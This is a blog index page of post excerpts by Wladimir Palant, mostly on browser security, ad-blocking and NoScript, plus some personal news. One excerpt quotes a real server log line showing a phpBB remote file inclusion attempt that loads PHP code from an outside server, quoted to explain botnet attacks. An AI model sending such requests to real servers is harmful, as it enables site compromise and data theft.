Posted on by Wladimir Palant

Until recently I thought that the low number of marriages and the relatively high age of people getting married in Germany was solely an expression of the mentality where everybody only relies on himself. Now I have learned that there is another factor as well — getting married in Germany is just difficult, despite all the talk about “improving family-friendliness of the state”. To attain the permission to get married (something I assumed to be a mere formality) you have to jump through all sorts of bureaucratic hoops. After having spent the last three years in Norway I simply didn’t expect this. Of course I should have known better but you easily get used to the good things.

According to the web page of the marital office you basically only need to bring your passports and fill out a few papers. Well, it also says that there is some additional talk for foreign citizens but that cannot be too bad? It came out this talk was only there to tell what additional certificates are required, something that they “absolutely could not tell on phone” (despite the fact that the official requirements are available on the internet — if you only know what to look for).

Read more… Comment [21]

Posted on by Wladimir Palant

Disclamer: This post is only about using NoScript as a security solution, not as a way to block annoyances.

It seems that me pointing out the fundamental flaw in NoScript only inspired another round of madness — that’s the only name I can find for it. Giorgio Maone has developed a solution that will effectively stop untrusted sites from injecting JavaScript through XSS holes in whitelisted sites. He is currently testing it with a development build and from what I can tell it mostly holds what it promises. Is that an achievement? Giorgio has obviously put much thought into this feature but I still have to say: no.

Read more… Comment [19]

Posted on by Wladimir Palant

I had to laugh out loudly on this one. The IEBlog announces the winners of the IE Add-ons Contest. Guess who won the Grand Prize? Apparently it is a great Internet Explorer add-on called “Inline Search”:

Inline Search provides a way to search for content on a webpage without bringing up the Find Dialog. It incorporates find as you type, highlights search terms and has several other really useful features!

Read more… Comment [3]

Posted on by Wladimir Palant

I had a lengthy discussion with Giorgio Maone (author of the NoScript extension) about what is a security solution and what isn’t. Starting point was my statement that, while being excellent for getting rid of annoyances, neither Adblock Plus nor NoScript are really security solutions. Both have the potential, so why not?

Let’s look at the easier case first: Adblock Plus. Adblock Plus is structured as a blacklist, you usually specify the addresses that you don’t want to load. So if there is a security issue that can be solved by blocking a certain address you will have to add a filter for this address. Requiring an action for each single vulnerability discovered disqualifies Adblock Plus, a real security solution would need to block everything unless explicitly allowed. Right now only the extremely rare case of malware-infested ads would be blocked by default however.

Read more… Comment [9]

Posted on by Wladimir Palant

I read a forum question from an Opera user who was upset because Opera 9.10 now saves web pages “like IE and Firefox” – meaning saving them with all the included files. His problem was easily solved with a configuration change but it got me thinking. Generally this doesn’t seem to be such a bad idea, it allows you to open a saved web page and it will look exactly the same. So I tried to understand why this user was so upset and why I almost never use this feature myself. It seems there are three things.

Read more… Comment [14]

Posted on by Wladimir Palant

I already left Darmstadt and I am on my way back to Oslo now. The unpleasant surprise is that Germanwings no longer flies to Oslo. I have no idea why they stopped serving this direction in the middle of the season — I couldn’t find it mentioned anywhere, there are just no more flights between Cologne and Oslo (the webpages of both airports confirm this so this isn’t a glitch in Germanwings’ database). That means that I will fly from Düsseldorf with Norwegian which is slightly less convenient. But at least I will spend a few more days in Cologne.

I have to be finished with my PhD in two months, so I guess I will be very busy now. Don’t expect to see much Adblock Plus progress during this time and I probably won’t look at the forum all too often. As usually, anything urgent is better sent with a mail directly to me. I cannot promise a fast reply but I will look at it.

Read more… Comment [5]

Posted on by Wladimir Palant

I guess some of you run a web server. Maybe you have noticed entries like this one in your logs:

"GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\r HTTP/1.1" 302 5 "-" "-"

What is this about? In this particular case somebody tried to use a security hole in an older phpBB version to execute PHP code loaded from another server. I had several hundreds of entries like this one in the last month, targeting vulnerabilities in all kinds of PHP scripts (most of which are not even installed here). The attackers tried to install backdoors, defacement tools or in one case a simple script to send all e-mail addresses from the local phpBB installation to its owner. The requests are usually done by other web servers, I guess those have the backdoor already installed (a botnet).

Read more… Comment [2]

Posted on by Wladimir Palant

I recently linked to an article stating that users of Internet Explorer have been exposed to known critical vulnerabilities for 284 days last year. That sounds bad enough but unfortunately it is not all. For example I came across a vulnerability in Internet Explorer that has been ranked “Less critical” for reasons I don’t understand. What this does — it basically eliminates same-origin checks, any web site can read contents of another site. I put up an example that can check whether you are logged in on Google or Yahoo and read out your user name — provided that you use Internet Explorer. It could just as well read out your mail or change your mail password. It could also go into your banking account if you happen to be logged in. Information on this vulnerability has been published April last year and still unpatched in both Internet Explorer 6.0 and 7.0.

Read more… Comment [4]

Posted on by Wladimir Palant

I have seen many people complaining about how Firefox is no more secure than Internet Explorer. Usually this impression comes up when people read the long lists of security bugs fixed with every maintenance release. Since I have reported a few security bugs myself and could observe how Mozilla deals with those, I knew well that Firefox is still incomparably more secure than Internet Explorer — and now there is proof. Internet Explorer Unsafe for 284 Days in 2006 has the data. Last year users of Internet Explorer have been exposed to unpatched critical security flaws for 284 days in total, on 98 of those days the security flaws were actively abused by web sites. In comparison, there was only one vulnerability in Firefox that was publicly disclosed before a patched Firefox release was available, amounting to 9 days of exposure.

So where did the long lists of security bugs go? Did the author of this article overlook them? No, he didn’t. These bugs were there, they have been discovered and fixed — and only then the information on them has been disclosed. So while each and every software has bugs, the major difference here is that Firefox vulnerabilities are reported and fixed before the information is disclosed and somebody gets a chance of abusing them — and with Internet Explorer it often happens the other way round.

Read more… Comment [9]